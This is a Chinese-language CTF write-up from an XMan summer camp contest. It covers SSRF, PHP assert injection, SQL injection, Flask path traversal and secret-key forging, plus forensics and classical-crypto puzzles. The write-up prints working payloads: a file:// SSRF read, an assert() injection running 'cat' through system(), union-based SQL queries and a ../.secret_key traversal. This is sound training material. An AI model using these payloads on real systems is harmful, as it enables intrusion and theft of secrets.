0x00 : 简介
Xman
第三届夏令营个人排位赛,10天的学习见到了梅子酒师傅、麦香师傅、1phan师傅、p0师傅、Xu师傅等等,tqltql.
0x01 : Simple SSRF
flag格式:XMAN{.*}
hint:curl
hint:flag在/etc/flag.txt
hint
没出之前在看misc
,后来才开始看这题.
考点主要是几个 :
- 用
file
协议读取本地文件 - 绕过
host
检查 - 截断
url
.(这里我使用了#
)
payload :
file://www.baidu.com/etc/flag.txt#
XMAN{f1l3_pr0toc0l_1s_us3ful}
0x02 : makeit
flag格式:XMAN{.*}
题目提示git
泄露,GitHack
拿出来扫一下就能拿到源码.
关键代码
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
payload:
/?page=','..')===false and system('cat templates/flag.php');//
构造第二句为 : assert("strpos('','..')===false and system('cat templates/flag.php');//','..')===false") or die("Detected hacking attemp!");
通过闭合前面的语句,同时查询文件,然后注释掉后面的语句,达到目的.
XMAN{flag_is_so_cool}
0x03 : bbsqli
flag格式:XMAN{.*}
题目存在session注入.
' union select 1,database()#
sqli #查库名
' union select 1,group_concat(table_name) from information_schema.TABLES where table_schema='sqli'#
[GDJM_flag],secrets #查表名
' union select 1,group_concat(column_name) from information_schema.columns where
flag #查字段名
' union select 1,flag from `[GDJM_flag]`#
xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g} #查flag
0x04 : bbsqli
flag格式:
flag{.*}
直接提供源码.
很显然当session['flag']=true
时,就能拿到flag
.
而本题的session
通过secret_key
构造.
那么就可以通过获取secret_key
来构造session
.
审计代码发现存在目录穿越.
@users.route('/asserts/<path:path>')
def static_handler(path):
filename = os.path.join(app.root_path,'asserts',path)
if os.path.isfile(filename):
return send_file(filename)
else:
abort(404)
可在/assert/..%2f..%2f.secret_key
获取key
,本地搭建环境获取session
提交即可获取flag
.
0x05 : File
root@kali:~/Desktop# mkdir tmp ; mount task_file.img tmp ; ls -larth tmp
mkdir: cannot create directory ‘tmp’: File exists
total 7.3M
drwx------ 2 root root 12K Mar 4 2015 lost+found
-rw-r--r-- 1 root root 64K Mar 4 2015 cat.jpg
-rw-r--r-- 1 root root 173K Mar 4 2015 cat2.jpg
-rw-r--r-- 1 root root 86K Mar 4 2015 cat3.jpg
-rw-r--r-- 1 root root 53K Mar 4 2015 cat4.jpg
-rw-r--r-- 1 root root 114K Mar 4 2015 cat5.jpg
-rw-r--r-- 1 root root 72K Mar 4 2015 cat6.jpg
-rw-r--r-- 1 root root 67K Mar 4 2015 cat7.jpg
-rw-r--r-- 1 root root 49K Mar 4 2015 cat8.jpg
-rw-r--r-- 1 root root 500K Mar 4 2015 catdog.gif
-rw-r--r-- 1 root root 805K Mar 4 2015 catgif.gif
-rw-r--r-- 1 root root 2.0M Mar 4 2015 catsipsip.gif
-rw-r--r-- 1 root root 70K Mar 4 2015 catreindeer.jpg
-rw-r--r-- 1 root root 36K Mar 4 2015 catyum.gif
-rw-r--r-- 1 1000 users 1.1M Mar 4 2015 catfunnyface.jpg
-rw-r--r-- 1 1000 users 2.0M Mar 4 2015 catcuddle.gif
-rw-r--r-- 1 1000 users 203K Mar 4 2015 catwindow.jpg
drwxr-xr-x 3 root root 1.0K Mar 4 2015 .
drwxr-xr-x 18 root root 4.0K Aug 10 13:35 ..
但是镜像有10M,估计还藏着其他东西,上工具.
root@kali:~/Desktop# extundelete --restore-all task_file.img
NOTICE: Extended attributes are not restored.
WARNING: EXT3_FEATURE_INCOMPAT_RECOVER is set.
The partition should be unmounted to undelete any files without further data loss.
If the partition is not currently mounted, this message indicates
it was improperly unmounted, and you should run fsck before continuing.
If you decide to continue, extundelete may overwrite some of the deleted
files and make recovering those files impossible. You should unmount the
file system and check it with fsck before using extundelete.
Would you like to continue? (y/n)
y
Loading filesystem metadata ... 2 groups loaded.
Loading journal descriptors ... 146 descriptors loaded.
Searching for recoverable inodes in directory / ...
2 recoverable inodes found.
Looking through the directory structure for deleted files ...
1 recoverable inodes still lost.
root@kali:~/Desktop# cd R
RECOVERED_FILES/ RSA-and-LLL-attacks-master/
ROPgadget/
root@kali:~/Desktop# cd RECOVERED_FILES/
root@kali:~/Desktop/RECOVERED_FILES# ls -larth
total 24K
-rw-r--r-- 1 root root 12K Aug 10 13:36 file.17
-rw-r--r-- 1 root root 54 Aug 10 13:36 .cat.jpg
drwxr-xr-x 19 root root 4.0K Aug 10 13:36 ..
drwxr-xr-x 2 root root 4.0K Aug 10 13:36 .
root@kali:~/Desktop/RECOVERED_FILES# file file.17 .cat.jpg
file.17: Vim swap file, version 7.4
.cat.jpg: data
root@kali:~/Desktop/RECOVERED_FILES# cat .cat.jpg
flag{fugly_cats_need_luv_2}
root@kali:~/Desktop/RECOVERED_FILES# cat file.17
b0VIM 7.4�
U3210#"! Utpad���f l a g { f u g l y _ c a t s _ n e e d _ l u v _ 2 }root@kali:~/Desktop/RECOVERED_FILES#
0x06 : XMan通行证
xman最强王者开始了,拿到通行证,开始你的王者之路。
XMan通行证flag格式:xman{.*}
hint:这是个签到题;
hint:base64解码
进行栅栏密码加密
使用凯撒密码进行解密
(我做过的最难的签到题)
因为做的人太少结果把writeup
放完了,这也太真实了...(放了我也不会)
a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg==
base64
kanbbrgghjl{zb____}vtlaln
栅栏(7)
kzna{blnl_abj_lbh_trg_vg}
凯撒
xman{oyay_now_you_get_it}
0x07 : ppap
flag格式:flag{.*}
流量包有一大串的base64
,尝试解密发现jpg
文件头.
写个脚本将base64
解密后写入文件
#!usr/bin/env python
#-*- coding:utf -*-
import base64
f=open('1.txt','r')
f1=open('1.jpg','w')
content=''
for str in f.readlines():
content = base64.b64decode(str)
f1.write(content)
f1.close()
解密到一半发生报错,发现base64
中间还有一段英文.
分析到最后很轻易发现有三个文件,一个包含很多jpg
文件的jpg
,一个zip
文件,一个xml
文件.
zip
文件里面有flag.txt
,而且加密,显然是拿到密码.
这里没什么思路,google
了一下没想到找到原题....僵
0x08 : autokey
flag格式:flag{.*}
这题比赛时没做出来,但只差最后一步,所以写下来.
首先是经典的提取usb
流量
tshark.txt -r task_AutoKey.pcapng -T fields -e usb.data > usb.txt
网上找个脚本解密usb
流量.
#!usr/bin/env python
#-*- coding:utf-8 -*-
mappings = { 0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G", 0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-", 0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'", 0x36:",", 0x37:"." }
nums = []
keys = open('usbdata.txt')
for line in keys:
if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
continue
nums.append(int(line[6:8],16))
keys.close()
output = ""
for n in nums:
if n == 0 :
continue
if n in mappings:
output += mappings[n]
else:
output += '[unknown]'
print 'output :\n' + output
拿到:
output :
[unknown]A[unknown]UTOKEY''.DECIPHER'[unknown]MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXO[DEL]PZE[DEL]IZ'
这里将[unknown]
去掉,[DEL]
是去掉后面一个字符,最后得到
AUTOKEY''.DECIPHER'MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ'
这里看到autokey
和题目吻合,字符串形式很像密文,于是百度了autokey
加密,提示需要关键字,也可以理解为密钥.
但是我没看到密钥,于是写了个脚本爆破.
#!usr/bin/env python
#-*- coding:utf-8 -*-
from pycipher import Autokey
import itertools as its
dictionary='QWERTYUIOPASDFGHJKLZXCVBNM'
r=its.product(dictionary,repeat=4)
f=open('flag.txt','w')
for i in r:
a = Autokey("".join(i)).decipher('MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXPZIZ')
# print "".join(i)
# print a
f.write("".join(i))
f.write("\n")
f.write(a)
f.write("\n")
f.close()
通过修改repeat
参数来指定位数爆破,在密钥为hell
拿到一个看着像flag
的字符串.
>>> print Autokey('hell').decipher('MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ')
FLAGQUFWJKTSLZMRZZPGHAGXZQUXSUDCWRHMPEMIQXZJXMFJTWONHLJALXAXEQMSHCVKCZYOFAGMGOAJCMAZQGPMPBWTDVJLEOERNIDCVFPKFHMLZQCOFJ
然而并不是flag
....思路就此打住.
晚上看日志发现有的师傅usb
流量就能解到flag
,羡慕死了希望师傅教我写脚本.
余老师牛批